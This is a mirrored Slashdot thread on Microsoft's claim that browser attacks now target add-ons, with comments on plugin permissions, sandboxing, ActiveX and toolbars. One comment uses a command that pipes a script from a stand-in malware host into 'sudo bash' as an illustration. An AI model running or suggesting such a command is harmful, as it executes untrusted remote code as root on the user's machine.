Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Blames Add-Ons For Browser Woes

Posted by timothy on from the sounds-semi-reasonable dept.

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

18 of 307 comments (clear)

  1. Duh by Drinking+Bleach · · Score: 5, Insightful

    Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

    !news

  2. I'll still blame you for everything else. by retech · · Score: 5, Insightful

    Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've miss some.

  3. Permissions by gurps_npc · · Score: 5, Insightful

    And if the Add on's were given far more permission than they actually need? If the browser works right, then the damage a poorly written add on can do should be minimal.

    --
    excitingthingstodo.blogspot.com
    1. Re:Permissions by geirnord · · Score: 5, Insightful

      I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

    2. Re:Permissions by MadnessASAP · · Score: 4, Insightful

      Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school enviroments without Administrator access is impossible.

      --
      I may agree with what you say, but I will defend to the death your right to face the consequences of saying it.
    3. Re:Permissions by legirons · · Score: 3, Insightful

      IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.

      Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)

      Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)

    4. Re:Permissions by SanityInAnarchy · · Score: 4, Insightful

      Just in case anyone was going to interpret this literally:

      Ideally, most of these plugins should be setuid as nobody

      No, no, a thousand times no!

      I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.

      These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.

      The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.

      In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.

      But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!

      --
      Don't thank God, thank a doctor!
  4. I've always said this. by bigstrat2003 · · Score: 4, Insightful

    The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

    This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

    --
    "16MB (fuck off, MiB fascists)" - The Mighty Buzzard
    1. Re:I've always said this. by Sloppy · · Score: 5, Insightful

      The biggest part of internet security is paying attention to where you go.

      I would agree with you, if "going" to a malware site meant

      curl ftp://malwaresite.com/malware.sh | sudo bash

      Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

      "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  5. But remember by dedazo · · Score: 5, Insightful

    If it's Firefox, it's perfectly OK to blame the add-ons.

    Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

    And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  6. Bullshit. Plain utter bullshit. by syousef · · Score: 4, Insightful

    Many non-power-users don't use addons at all.

    If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

    --
    These posts express my own personal views, not those of my employer
    1. Re:Bullshit. Plain utter bullshit. by EvanED · · Score: 4, Insightful

      Many non-power-users don't use addons at all.

      And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

    2. Re:Bullshit. Plain utter bullshit. by athakur999 · · Score: 4, Insightful

      Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

      If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

      --
      "People that quote themselves in their signatures bother me" - athakur999
  7. Speaking of add-ons by Anonymous Coward · · Score: 5, Insightful

    Would an example of this include the Active X Control you have to install to be able to run Windows Update?

  8. Re:I think they have a point.. by Ethanol-fueled · · Score: 3, Insightful

    Finally!

    28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.

    Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

  9. Plugin model by Enderandrew · · Score: 4, Insightful

    Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security?

    Take a look at how Chrome handles plugins and then try to pass the buck.

    --
    http://blindscribblings.com - Tasty pop-culture in conceptual fashion.
  10. It's still your damn fault by BlueParrot · · Score: 4, Insightful

    Now lets see... why is it that we need addons for something a simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.

  11. Re:I think they have a point.. by greg_barton · · Score: 4, Insightful

    Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to haev no problem doing this, so why can't Windows?